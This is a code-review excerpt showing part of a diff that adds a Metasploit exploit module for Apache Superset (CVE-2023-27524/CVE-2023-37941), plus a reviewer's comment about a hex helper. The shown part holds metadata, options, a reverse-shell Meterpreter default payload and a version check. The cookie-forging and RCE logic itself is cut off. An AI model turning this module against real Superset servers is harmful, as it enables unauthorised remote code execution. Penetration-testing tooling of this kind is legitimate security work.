modules/exploits/linux/http/apache_superset_cookie_sig_rce.rb

```diff
@@ -0,0 +1,448 @@
+          in a webapp.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # MSF module
+          'paradoxis', #  original flask-unsign tool
+          'Spencer McIntyre', # MSF flask-unsign library
+          'Naveen Sunkavally' # horizon3.ai writeup and cve discovery
+        ],
+        'References' => [
+          ['URL', 'https://github.com/Paradoxis/Flask-Unsign'],
+          ['URL', 'https://vulcan.io/blog/cve-2023-27524-in-apache-superset-what-you-need-to-know/'],
+          ['URL', 'https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/'],
+          ['URL', 'https://www.horizon3.ai/apache-superset-part-ii-rce-credential-harvesting-and-more/'],
+          ['URL', 'https://github.com/horizon3ai/CVE-2023-27524/blob/main/CVE-2023-27524.py'],
+          ['EDB', '51447'],
+          ['CVE', '2023-27524'],
+          ['CVE', '2023-37941'] # rce
+        ],
+        'Platform' => ['python'],
+        'Privileged' => false,
+        'Arch' => ARCH_PYTHON,
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
+        'DefaultOptions' => {
+          'PAYLOAD' => 'python/meterpreter/reverse_tcp'
+        },
+        'DisclosureDate' => '2023-09-06',
+        'DefaultTarget' => 0,
+        # https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html
+        'Notes' => {
+          'Stability' => [],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(8088),
+        OptString.new('USERNAME', [true, 'The username to authenticate as', nil]),
+        OptString.new('PASSWORD', [true, 'The password for the specified username', nil]),
+        OptString.new('TARGETURI', [ true, 'Relative URI of Apache Superset installation', '/'])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi!({
+      'keep_cookies' => true,
+      'uri' => normalize_uri(target_uri.path, 'login')
+    })
+    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
+    return CheckCode::Unknown("#{peer} - Unexpected response code (#{res.code})") unless res.code == 200
+    return CheckCode::Safe("#{peer} - Unexpected response, version_string not detected") unless res.body.include? 'version_string'
+    unless res.body =~ /&#34;version_string&#34;: &#34;([\d.]+)&#34;/
+      return CheckCode::Safe("#{peer} - Unexpected response, unable to determine version_string")
+    end
+
+    version = Rex::Version.new(Regexp.last_match(1))
+    if version < Rex::Version.new('2.0.1') && version >= Rex::Version.new('1.4.1')
+      Exploit::CheckCode::Appears("Apache Supset #{version} is vulnerable")
+    else
+      CheckCode::Safe("Apache Supset #{version} is NOT vulnerable")
+    end
+  end
+
+  def hexlify(data)
```

Comment:
I think there's a method in Rex::Text that does this already, might be worth confirming. Potentially just `Rex::Text.to_hex`